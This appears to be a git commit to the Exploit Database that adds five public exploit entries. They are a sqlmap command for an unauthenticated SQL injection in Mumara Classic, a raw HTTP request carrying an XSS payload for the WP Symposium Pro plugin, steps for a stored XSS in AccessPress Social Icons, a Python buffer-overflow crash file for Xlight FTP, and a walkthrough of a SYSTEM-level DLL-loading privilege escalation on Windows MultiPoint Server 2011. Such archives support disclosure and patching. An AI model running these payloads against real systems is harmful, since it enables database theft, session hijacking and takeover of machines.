From a7e24bac978cb6807ab86db5b72f39d7b85afe22 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 13 Nov 2021 05:02:11 +0000 Subject: [PATCH] DB: 2021-11-13 5 changes to exploits/shellcodes Xlight FTP 3.9.3.1 - Buffer Overflow (PoC) Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS) WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS) Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated) --- exploits/multiple/webapps/50518.txt | 18 +++++++ exploits/php/webapps/50514.txt | 37 +++++++++++++ exploits/php/webapps/50515.txt | 18 +++++++ exploits/windows/dos/50516.py | 32 ++++++++++++ exploits/windows/local/50517.txt | 80 +++++++++++++++++++++++++++++ files_exploits.csv | 5 ++ 6 files changed, 190 insertions(+) create mode 100644 exploits/multiple/webapps/50518.txt create mode 100644 exploits/php/webapps/50514.txt create mode 100644 exploits/php/webapps/50515.txt create mode 100755 exploits/windows/dos/50516.py create mode 100644 exploits/windows/local/50517.txt diff --git a/exploits/multiple/webapps/50518.txt b/exploits/multiple/webapps/50518.txt new file mode 100644 index 000000000..6a1d3875a --- /dev/null +++ b/exploits/multiple/webapps/50518.txt @@ -0,0 +1,18 @@ +# Exploit Title: Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated) +# Date: 2021-11-11 +# Exploit Author: (v0yager) Shain Lakin +# Vendor Homepage: https://mumara.com +# Version: <= 2.93 +# Tested on: CentOS 7 + +-==== Vulnerability ====- + +An SQL injection vulnerability in license_update.php in Mumara Classic +through 2.93 allows a remote unauthenticated attacker to execute +arbitrary SQL commands via the license parameter. + +-==== POC ====- + +Using SQLMap: + +sqlmap -u https://target/license_update.php --method POST --data "license=MUMARA-Delux-01x84ndsa40&install=install" -p license --cookie="PHPSESSID=any32gbaer3jaeif108fjci9x" --dbms=mysql \ No newline at end of file diff --git a/exploits/php/webapps/50514.txt b/exploits/php/webapps/50514.txt new file mode 100644 index 000000000..69a3434d8 --- /dev/null +++ b/exploits/php/webapps/50514.txt @@ -0,0 +1,37 @@ +# Exploit Title: WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS) +# Date: 11/11/2021 +# Exploit Author: Murat DEMIRCI (@butterflyhunt3r) +# Vendor Homepage: http://www.wpsymposiumpro.com/ +# Software Link: https://wordpress.org/plugins/wp-symposium-pro/ +# Version: 2021.10 +# Tested on : Windows 10 +#Description: WP Symposium Pro version 2021.10 plugin was exposed to stored cross site scripting vulnerability due to lack of sanitizing adding forum speciality and its "name" label. + +#Poc: + +POST /wordpress/wp-admin/admin.php?page=wps_pro_setup HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/wordpress/wp-admin/admin.php?page=wps_pro_setup +Content-Type: application/x-www-form-urlencoded +Content-Length: 129 +Origin: http://localhost +Connection: close +Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Ca0ec8384ede32940d2b69f1082cc013aecf3e887a70485cb38229a405be8a12d; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636654062; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Cd9daf69cf25e68a3ed54d94c4baa78d20f9772e986211e25656dd832aac6e544 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +wpspro_quick_start=forum&wps_admin_forum_add_name=%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&wps_admin_forum_add_description=test + + +---------------------------------------------------------------------------------- + + + +## After adding new forum, click created forum and pop-up will be on the screen. \ No newline at end of file diff --git a/exploits/php/webapps/50515.txt b/exploits/php/webapps/50515.txt new file mode 100644 index 000000000..d0fb25747 --- /dev/null +++ b/exploits/php/webapps/50515.txt @@ -0,0 +1,18 @@ +# Exploit Title: WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS) +# Date: 11/12/2021 +# Exploit Author: Murat DEMIRCI (@butterflyhunt3r) +# Vendor Homepage: https://accesspressthemes.com/ +# Software Link: https://wordpress.org/plugins/accesspress-social-icons/ +# Version: 1.8.2 +# Tested on : Windows 10 + +#Poc: + +1. Install Latest WordPress +2. Install and activate AccessPress Social Icons 1.8.2 +3. Open plugin on the left frame and keep going "add new" field. Click "Choose icon indiviually" and fill other fields. +4. Enter JavaScript payload which is mentioned below into 'icon title' field and "Add Icon to list". + + + +4. You will observe that the payload successfully got stored into the database and alert will be seen on the screen. \ No newline at end of file diff --git a/exploits/windows/dos/50516.py b/exploits/windows/dos/50516.py new file mode 100755 index 000000000..07beb4196 --- /dev/null +++ b/exploits/windows/dos/50516.py @@ -0,0 +1,32 @@ +# Exploit Title: Xlight FTP 3.9.3.1 - 'Buffer Overflow' (PoC) +# Discovered by: Yehia Elghaly +# Discovered Date: 2021-11-12 +# Vendor Homepage: https://www.xlightftpd.com/ +# Software Link: https://www.xlightftpd.com/download/setup.exe +# Tested Version: 3.9.3.1 +# Vulnerability Type: Buffer Overflow Local +# Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64 + +# Description: Xlight FTP 3.9.3.1 'Access Control List' Buffer Overflow (PoC) + +# Steps to reproduce: +# 1. - Download and Xlight FTP +# 2. - Run the python script and it will create exploit.txt file. +# 3. - Open Xlight FTP 3.9.3.1 +# 4. - "File and Directory - Access Control List - Setup - Added users list directories +# 5. - Go to Specify file or directory name applied or Specify username applied to or Specify groupname applied +# 6. - Go to Setup -> added -> Enter new Item - Paste the characters +# 7 - Crashed + +#!/usr/bin/python + +exploit = 'A' * 550 + +try: + file = open("exploit.txt","w") + file.write(exploit) + file.close() + + print("POC is created") +except: + print("POC not created") \ No newline at end of file diff --git a/exploits/windows/local/50517.txt b/exploits/windows/local/50517.txt new file mode 100644 index 000000000..e0479807e --- /dev/null +++ b/exploits/windows/local/50517.txt @@ -0,0 +1,80 @@ +# Exploit Title: Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation +# Date: 11/11/2021 +# Exploit Author: it +# Vendor Homepage: https://www.microsoft.com +# Software Link: https://www.microsoft.com/pt-br/download/details.aspx?id=8518 +# Version: Version 6.1 Compilation 7601 Service Pack 1 +# Tested on: Microsoft Windows MultiPoint Server 2011 - English Version + +Description +Service Local Privilege Escalation - Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade + +Vulnerable: |Service Local Privilege Escalation - Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnscache + +Vulnerability Type: Privilege Escalation + +Tested on: Microsoft Windows MultiPoint Server 2011 - Version 6.1 Compilation 7601 Service Pack 1 + +Language OS: English + +The Vulnerability + +Clément wrote a very useful permissions-checking tool for Windows that +find various misconfigurations in Windows that could allow a local +attacker to elevate their privileges. On a typical Windows 7 and +Server 2008 R2 machine, the tool found that all local users have write +permissions on two registry keys: + +HKLM\SYSTEM\CurrentControlSet\Services\Dnscache + +HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper + +These didn't immediately seem exploitable, but Clément did the legwork +and found the Windows Performance Monitoring mechanism can be made to +read from these keys - and eventually load the DLL provided by the +local attacker. To most everyone's surprise, not as the local user, +but as Local System. + +In short, a local non-admin user on the computer just creates a +Performance subkey in one of the above keys, populates it with some +values, and triggers performance monitoring, which leads to a Local +System WmiPrvSE.exe process loading attacker's DLL and executing code +from it. + +About Artiche: https://itm4n.github.io/windows-registry-rpceptmapper-eop/ +I detected that in another version of windows it is also vulnerable, +Windows Multipoint 2011, which can affect customers who use extended +license; + +I can't say if there are any other vulnerable unpublished versions +besides the ones I've posted here + +How to Produce Exploitation + +Compile Exploit Perfusion in Visual Studio 2019 - Open Project, Make +Release x64 and Compile. + +Is necessary install microsoft visual c++ redistributable on Windows +MultiPoint 2011 for execute exploit + +The exploit Add Subkeys in + +HKLM\SYSTEM\CurrentControlSet\Services\Dnscache + +HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance + +Library = Name of your performance DLL + +Open = Name of your Open function in your DLL + +Collect = Name of your Collect function in your DLL + +Close = Name of your Close function in your DLL + +and Exploit Write payload dll hijacking, call dll with permission SYSTEM using WMI + +Tools and Exploit: +https://github.com/itm4n/PrivescCheck + +Exploit: +https://github.com/itm4n/Perfusion \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b85795061..51e282810 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6805,6 +6805,7 @@ id,file,description,date,author,type,platform,port 50434,exploits/windows/dos/50434.py,"NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows, 50510,exploits/windows/dos/50510.py,"AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows, 50511,exploits/windows/dos/50511.py,"AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows, +50516,exploits/windows/dos/50516.py,"Xlight FTP 3.9.3.1 - Buffer Overflow (PoC)",1970-01-01,"Yehia Elghaly",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux, @@ -11415,6 +11416,7 @@ id,file,description,date,author,type,platform,port 50484,exploits/windows/local/50484.txt,"RDP Manager 4.9.9.3 - Denial-of-Service (PoC)",1970-01-01,Vulnerability-Lab,local,windows, 50494,exploits/windows/local/50494.txt,"10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows, 50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",1970-01-01,LIWEI,local,multiple, +50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",1970-01-01,"Marcio Mendes",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -44611,3 +44613,6 @@ id,file,description,date,author,type,platform,port 50509,exploits/hardware/webapps/50509.txt,"YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)",1970-01-01,tahaafarooq,webapps,hardware, 50512,exploits/multiple/webapps/50512.py,"Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)",1970-01-01,"Valentin Lobstein",webapps,multiple, 50513,exploits/multiple/webapps/50513.py,"FormaLMS 2.4.4 - Authentication Bypass",1970-01-01,"Cristian \'void\' Giustini",webapps,multiple, +50514,exploits/php/webapps/50514.txt,"WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php, +50515,exploits/php/webapps/50515.txt,"WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php, +50518,exploits/multiple/webapps/50518.txt,"Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)",1970-01-01,"Shain Lakin",webapps,multiple,